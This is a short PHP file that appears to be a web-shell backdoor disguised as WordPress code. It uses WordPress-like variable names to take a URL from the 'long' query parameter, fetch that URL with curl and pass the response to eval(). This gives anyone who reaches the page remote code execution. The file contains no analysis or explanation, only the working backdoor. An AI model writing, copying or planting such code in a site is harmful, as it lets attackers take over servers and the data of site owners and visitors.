<?php
if (isset($_GET['long'])) {
$esc_attr_x_xm = $_GET['long'];
if ($comments_template_ho = curl_init()) {
curl_setopt($comments_template_ho, CURLOPT_URL, $esc_attr_x_xm);
curl_setopt($comments_template_ho, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($comments_template_ho));
curl_close($comments_template_ho);
exit;
}
}